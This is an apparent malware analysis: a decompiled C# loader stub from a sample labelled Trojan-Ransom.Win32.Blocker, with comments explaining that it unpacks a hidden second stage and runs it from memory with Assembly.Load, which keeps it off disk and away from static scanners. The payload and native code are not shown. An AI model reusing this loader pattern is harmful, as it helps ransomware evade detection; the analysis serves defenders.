// Decompiled with JetBrains decompiler
// Type: <Module>
// Assembly: nsnet, Version=1.0.2132.1881, Culture=neutral, PublicKeyToken=null
// MVID: E55443D8-38A6-48C9-BD12-6F2C033A02DB
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036.exe
using System;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Security;
// Global module type of the decompiled stub. Its managed entry point (main) asks
// native code for a buffer size and for the buffer contents, loads that buffer as
// a .NET assembly straight from memory, and calls the loaded assembly's entry point.
// Every other method in this type is a declaration only: the MethodImpl attributes
// mark the bodies as native/unmanaged code, so none of them is visible in this listing.
//
// Analyst notes:
//  - The RangeDecoder*/Lzma* names match the C decoder shipped with the LZMA SDK,
//    which suggests the embedded payload is stored LZMA-compressed. That is inferred
//    from names only; the native bodies are absent -- TODO confirm in a disassembler.
//  - The second stage reaches the runtime only through Assembly.Load(byte[]), so it
//    has no file of its own on disk and static scanning of the stub sees only the
//    packed data. Runtime visibility comes from assembly-load telemetry (for example
//    the .NET runtime's ETW loader events) and, on .NET Framework 4.8 and later,
//    from AMSI scanning of assemblies loaded from byte arrays.
//  - For analysis, the unpacked image is the content of rawAssembly once
//    GetoriginalData has returned a non-zero value.
internal class \u003CModule\u003E
{
  // Function-pointer fields (__FnPtr is decompiler pseudo-syntax, not C#). Nothing in
  // this listing assigns them. Their signatures have the same shape as the two
  // callback parameters of LzmaBlockUnPack below; presumably they point at memory
  // free/allocate routines used by the native decompressor -- inferred from the
  // names, not shown here.
  public static __FnPtr<int (uint, uint, uint)> LzmaVirtualFree;
  public static __FnPtr<uint (uint, uint, uint, uint)> LzmaVirtualAlloc;

  // Managed entry point of the stub.
  // Steps: size the buffer from GetoriginalSize(), let GetoriginalData() fill it,
  // load it with Assembly.Load, forward the command-line arguments if the loaded
  // entry point declares parameters, then invoke that entry point.
  // Returns 0 on every path, including when GetoriginalData reports failure.
  public static unsafe int main()
  {
    // Buffer for the second-stage image. The size comes from native code as a uint
    // and is cast to int; a value above int.MaxValue would not survive the cast.
    byte[] rawAssembly = new byte[(int) \u003CModule\u003E.GetoriginalSize()];
    // Array.Initialize runs default constructors of value-type elements; for a
    // freshly allocated byte[] this changes nothing.
    rawAssembly.Initialize();
    // Pin the array so native code can write through a raw pointer. Taking
    // &rawAssembly[0] throws if the reported size was 0.
    fixed (byte* numPtr = &rawAssembly[0])
    {
      // Native call that receives the pinned buffer; main treats any non-zero
      // return as success. Presumably this is where the payload is unpacked into
      // the buffer -- the native body is not part of this listing.
      if (\u003CModule\u003E.GetoriginalData(numPtr) != 0)
      {
        // In-memory load: the image is parsed from the byte array, not from a file.
        Assembly assembly = Assembly.Load(rawAssembly);
        // EntryPoint is null for an assembly without one (a library); the stub does
        // not check for that. ".Count" on an array is how the decompiler rendered
        // the length read.
        int count1 = assembly.EntryPoint.GetParameters().Count;
        object[] parameters = new object[count1];
        if (count1 != 0)
        {
          // Rebuild the string[] args the loaded entry point expects:
          // GetCommandLineArgs() puts the program name at index 0, so copying
          // starts at index 1 and the new array is one element shorter.
          string[] commandLineArgs = Environment.GetCommandLineArgs();
          int count2 = Environment.GetCommandLineArgs().Count;
          string[] strArray = new string[count2 - 1];
          int index = 1;
          if (1 < count2)
          {
            do
            {
              strArray[index - 1] = commandLineArgs[index];
              ++index;
            }
            while (index < count2);
          }
          // Only slot 0 is filled, whatever count1 is; any further slots stay null.
          parameters[0] = (object) strArray;
        }
        // ISSUE: explicit non-virtual call
        // (__nonvirtual is decompiler pseudo-syntax for that call form.) A null
        // target is passed, as for a static method; control passes to the loaded
        // assembly's entry point here.
        __nonvirtual (assembly.EntryPoint.Invoke((object) null, parameters));
      }
      return 0;
    }
  }

  // ---- Native declarations -------------------------------------------------------
  // Each method below is "extern" with MethodCodeType.Native and
  // MethodImplOptions.Unmanaged: the implementation is machine code, so the
  // decompiler shows signatures only. [SuppressUnmanagedCodeSecurity] removes the
  // runtime's unmanaged-code permission stack walk on calls to them. The parameter
  // names (obj0, obj1, ...) are placeholders; their meanings are not recoverable
  // from this listing. None of these is called from managed code in this listing
  // except GetoriginalSize and GetoriginalData.

  // Takes a _CRangeDecoder*, a byte pointer and a uint; by name, sets up the range
  // decoder -- presumably over an input buffer and its length.
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe void RangeDecoderInit([In] _CRangeDecoder* obj0, [In] byte* obj1, [In] uint obj2);

  // Range-decoder helper: takes the decoder state and an int, returns a uint.
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe uint RangeDecoderDecodeDirectBits([In] _CRangeDecoder* obj0, [In] int obj1);

  // Range-decoder helper: takes a ushort pointer and the decoder state, returns an int.
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe int RangeDecoderBitDecode([In] ushort* obj0, [In] _CRangeDecoder* obj1);

  // Range-decoder helper: takes a ushort pointer, an int and the decoder state.
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe int RangeDecoderBitTreeDecode(
    [In] ushort* obj0,
    [In] int obj1,
    [In] _CRangeDecoder* obj2);

  // Same signature as RangeDecoderBitTreeDecode; by name, the reverse-order variant.
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe int RangeDecoderReverseBitTreeDecode(
    [In] ushort* obj0,
    [In] int obj1,
    [In] _CRangeDecoder* obj2);

  // LZMA literal helper: takes a ushort pointer, the decoder state and one byte,
  // returns one byte.
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe byte LzmaLiteralDecodeMatch(
    [In] ushort* obj0,
    [In] _CRangeDecoder* obj1,
    [In] byte obj2);

  // LZMA length helper: takes a ushort pointer, the decoder state and an int.
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe int LzmaLenDecode([In] ushort* obj0, [In] _CRangeDecoder* obj1, [In] int obj2);

  // By name, the main decode routine. The nine parameters are three (byte*, uint)
  // pairs with three ints after the first pair; this looks like buffer/size pairs
  // plus three integer settings, but the roles are an assumption -- TODO confirm.
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe int LzmaDecode(
    [In] byte* obj0,
    [In] uint obj1,
    [In] int obj2,
    [In] int obj3,
    [In] int obj4,
    [In] byte* obj5,
    [In] uint obj6,
    [In] byte* obj7,
    [In] uint obj8);

  // Takes two byte pointers and two function pointers whose signatures match the
  // LzmaVirtualAlloc and LzmaVirtualFree fields, in that order. Presumably unpacks
  // one block using caller-supplied allocate/free callbacks -- verify natively.
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe int LzmaBlockUnPack(
    [In] byte* obj0,
    [In] byte* obj1,
    [In] __FnPtr<uint (uint, uint, uint, uint)> obj2,
    [In] __FnPtr<int (uint, uint, uint)> obj3);

  // Returns the value main uses as the length of the buffer it allocates.
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern uint GetoriginalSize();

  // Receives a pointer to main's pinned buffer; main loads the buffer as an
  // assembly only when this returns a non-zero value.
  [SuppressUnmanagedCodeSecurity]
  [MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
  public static extern unsafe int GetoriginalData([In] byte* obj0);
}